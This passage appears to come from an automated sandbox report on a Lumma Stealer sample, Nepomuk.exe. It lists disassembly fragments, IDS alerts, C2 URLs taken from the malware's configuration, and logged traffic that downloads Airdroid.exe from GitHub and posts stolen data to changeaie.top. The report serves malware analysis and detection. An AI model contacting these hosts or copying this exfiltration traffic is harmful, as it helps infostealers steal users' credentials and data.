adFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+14h]0_2_01599110
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_0159C110
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [edx]0_2_01551120
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov dword ptr [esp+04h], edi0_2_0156A1DF
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-70h]0_2_01595190
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_015590B0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_015590B0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_2_0155A310
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov byte ptr [eax], cl0_2_0156CEB8
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov edx, esi0_2_01575330
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov byte ptr [edx], cl0_2_0157E3CD
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then jmp eax0_2_0156D388
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_01584275
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov dword ptr [esp], eax0_2_01561201
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-7E9317F6h]0_2_015712DB
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_015512F0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then cmp word ptr [edi+ebx], 0000h0_2_015772A0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], BEB994C9h0_2_015772A0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+7A0F92D2h]0_2_0155B550
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0158454A
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+0000027Ch]0_2_01571510
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_01584534
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov dword ptr [esp+04h], edi0_2_0156D5E0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov dword ptr [esp+04h], edi0_2_0156D5E0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [eax]0_2_0159C4F0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1Ch]0_2_0155E49F
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], A4BF7AEEh0_2_01594750
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov edx, dword ptr [ecx+esi+3Ch]0_2_01594750
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+08h]0_2_0157F74B
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov word ptr [eax], cx0_2_015777C0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then cmp byte ptr [edx+esi], cl0_2_01551650
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov word ptr [eax], dx0_2_0156E67D
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov dword ptr [esp+04h], ebx0_2_01572610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+000000F0h]0_2_01572610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov word ptr [eax], cx0_2_01572610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [eax]0_2_0159C6D0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_01581680
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]0_2_01592960
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], BEB994C9h0_2_01580916
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+28h]0_2_0157F9A6
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+0D993EE3h]0_2_0157C8CC
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_01584B5B
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-349D2938h]0_2_0155BBC0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [eax+esi]0_2_0155BBC0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_01584BC6
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_01584BF3
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+10h]0_2_0157FAC0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then push esi0_2_01575D33
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, word ptr [ebx]0_2_0159AC50
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx+000001E4h]0_2_0155CC40
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+5C150C3Ch]0_2_0157FC7D
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+10h]0_2_01591C00
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+08h]0_2_01591C00
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+04h]0_2_01591C00
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_01584C05
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then cmp dword ptr [edx+ebx*8], A0E666EBh0_2_01594CC0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then lea ecx, dword ptr [esp+00000138h]0_2_0156AC97
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [esi+01h]0_2_01550F10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+000011C8h]0_2_0157AF00
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edx, byte ptr [eax+esi-1E5CF0B0h]0_2_01596F38
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_01582F20
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+28h]0_2_0157DFD0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax]0_2_01592FF2
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_0158DF90
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then cmp word ptr [esi+edi+02h], 0000h0_2_0157FEF9
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov word ptr [edi], cx0_2_0157FEF9
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], A4BF7AEEh0_2_03595350
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov edx, dword ptr [ecx+esi+3Ch]0_2_03595350
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+28h]0_2_0357EBD0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov dword ptr [esp+04h], edi0_2_0356ABFA
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [eax]0_2_0359D2D0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov dword ptr [esp], eax0_2_03561AF8
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_035841D1
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_035841D1
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, word ptr [ebx]0_2_0359B850
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx+000001E4h]0_2_0355D840
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [eax]0_2_0359D0F0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_0359CD10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+08h]0_2_0358034F
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then lea ecx, dword ptr [esp+00000138h]0_2_0356B36A
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax]0_2_03593B1D
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [esi+01h]0_2_03551B10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-7E9317F6h]0_2_03571B10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+000011C8h]0_2_0357BB00
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edx, byte ptr [eax+esi-1E5CF0B0h]0_2_03597B38
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_03583B20
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edx, byte ptr [eax+esi-1E5CF0B0h]0_2_03597BD9
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov word ptr [eax], cx0_2_035783C0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_0358EB90
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov word ptr [eax], dx0_2_0356F3B0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then cmp byte ptr [edx+esi], cl0_2_03552250
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]0_2_03593269
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax]0_2_03593269
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov dword ptr [esp+04h], ebx0_2_03573210
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+000000F0h]0_2_03573210
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov word ptr [eax], cx0_2_03573210
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then cmp word ptr [esi+edi+02h], 0000h0_2_03580AE0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov word ptr [edi], cx0_2_03580AE0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_03582280
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+7A0F92D2h]0_2_0355C150
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+0000027Ch]0_2_03572110
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then push esi0_2_03576933
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov byte ptr [edx], cl0_2_0357F18A
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+5C150C3Ch]0_2_0358081C
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then cmp word ptr [esi+edi+02h], 0000h0_2_0358081C
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov word ptr [edi], cx0_2_0358081C
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+10h]0_2_03592800
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+08h]0_2_03592800
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+04h]0_2_03592800
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then cmp dword ptr [edx+ebx*8], A0E666EBh0_2_035958C0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_2_0355AF10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov byte ptr [eax], cl0_2_0356DF0E
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov dword ptr [esp+04h], edi0_2_0356DF0E
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov dword ptr [esp+04h], edi0_2_0356DF0E
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-349D2938h]0_2_0355C7C0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [eax+esi]0_2_0355C7C0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then jmp eax0_2_0356DF8F
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+10h]0_2_035806C0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_03551EF0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+08h]0_2_0357FE84
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then cmp word ptr [edi+ebx], 0000h0_2_03577EA0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], BEB994C9h0_2_03577EA0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov edx, esi0_2_03575570
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], BEB994C9h0_2_0358151C
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+14h]0_2_03599D10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [edx]0_2_03551D20
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov byte ptr [eax], cl0_2_0356D5F0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-70h]0_2_03595D90
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+28h]0_2_035805AA
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+0D993EE3h]0_2_0357D49C
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_03559CB0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_03559CB0

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2061393 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soursopsf .run) : 192.168.2.4:57934 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2061395 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (changeaie .top) : 192.168.2.4:49666 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2061396 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) : 192.168.2.4:49716 -> 104.21.42.7:443
                    Source: Network trafficSuricata IDS: 2061396 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) : 192.168.2.4:49718 -> 104.21.42.7:443
                    Source: Network trafficSuricata IDS: 2061396 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) : 192.168.2.4:49717 -> 104.21.42.7:443
                    Source: Network trafficSuricata IDS: 2061396 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) : 192.168.2.4:49727 -> 104.21.42.7:443
                    Source: Network trafficSuricata IDS: 2061396 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) : 192.168.2.4:49721 -> 104.21.42.7:443
                    Source: Network trafficSuricata IDS: 2061396 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) : 192.168.2.4:49719 -> 104.21.42.7:443
                    Source: Network trafficSuricata IDS: 2061396 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) : 192.168.2.4:49720 -> 104.21.42.7:443
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: quantyu.bet/AOSkwi
                    Source: Malware configuration extractorURLs: soursopsf.run/gsoiao
                    Source: Malware configuration extractorURLs: changeaie.top/geps
                    Source: Malware configuration extractorURLs: easyupgw.live/eosz
                    Source: Malware configuration extractorURLs: liftally.top/xasj
                    Source: Malware configuration extractorURLs: upmodini.digital/gokk
                    Source: Malware configuration extractorURLs: salaccgfa.top/gsooz
                    Source: Malware configuration extractorURLs: zestmodp.top/zeda
                    Source: Malware configuration extractorURLs: xcelmodo.run/nahd
                    Connects to many ports of the same IP (likely port scanning)
                    Source: global trafficTCP traffic: 185.121.233.152 ports 0,1,2,5,8,28150
                    Source: global trafficTCP traffic: 192.168.2.4:49731 -> 185.121.233.152:28150
                    Source: global trafficHTTP traffic detected: GET /DLMKER/LeryStable/raw/refs/heads/main/Airdroid.exe HTTP/1.1Connection: Keep-AliveHost: github.com
                    Source: global trafficHTTP traffic detected: GET /DLMKER/LeryStable/refs/heads/main/Airdroid.exe HTTP/1.1Connection: Keep-AliveHost: raw.githubusercontent.com
                    Source: Joe Sandbox ViewIP Address: 46.8.232.106 46.8.232.106
                    Source: Joe Sandbox ViewIP Address: 46.8.232.106 46.8.232.106
                    Source: Joe Sandbox ViewIP Address: 140.82.114.3 140.82.114.3
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49716 -> 104.21.42.7:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49718 -> 104.21.42.7:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49727 -> 104.21.42.7:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49729 -> 185.199.111.133:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49717 -> 104.21.42.7:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49721 -> 104.21.42.7:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49728 -> 140.82.114.3:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49719 -> 104.21.42.7:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49720 -> 104.21.42.7:443
                    Source: Network trafficSuricata IDS: 2822537 - Severity 1 - ETPRO EXPLOIT Possible Win32k Elevation of Privilege Vulnerability (CVE-2016-7191) : 185.199.111.133:443 -> 192.168.2.4:49729
                    Source: global trafficHTTP traffic detected: POST /geps HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 59Host: changeaie.top
                    Source: global trafficHTTP traffic detected: POST /geps HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YO6t203zjUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 19584Host: changeaie.top
                    Source: global trafficHTTP traffic detected: POST /geps HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=n4C6WMx76GdUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 8751Host: changeaie.top
                    Source: global trafficHTTP traffic detected: POST /geps HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0bt8K4rlv3dljCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 20419Host: changeaie.top
                    Source: global trafficHTTP traffic detected: POST /geps HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=jzp11Wf7t4MM3xSM1UlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 2436Host: changeaie.top
                    Source: global trafficHTTP traffic detected: POST /geps HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=vrrlA1O6WzAn3KQ4Ep0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 549398Host: changeaie.top
                    Source: global trafficHTTP traffic detected: POST /geps HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 97Host: changeaie.top
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.196.157
                    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.196.157
                    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.196.157
                    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.196.157
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
                    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.196.157
                    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.196.157
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
                    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.196.157
                    Source: global trafficHTTP traffic detected: GET /DLMKER/LeryStable/raw/refs/heads/main/Airdroid.exe HTTP/1.1Connection: Keep-AliveHost: github.com
                    Source: global trafficHTTP traffic detected: GET /DLMKER/LeryStable/refs/heads/main/Airdroid.exe HTTP/1.1Connection: Keep-AliveHost: raw.githubusercontent.com
                    Source: global trafficDNS traffic detected: DNS query: quantyu.bet
                    Source: global trafficDNS traffic detected: DNS query: soursopsf.run
                    Source: global trafficDNS traffic detected: DNS query: changeaie.top
                    Source: global trafficDNS traffic detected: DNS query: github.com
                    Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                    Source: unknownHTTP traffic detected: POST /geps HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 59Host: changeaie.top
                    Source: Nepomuk.exe, 00000000.00000003.1318339601.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
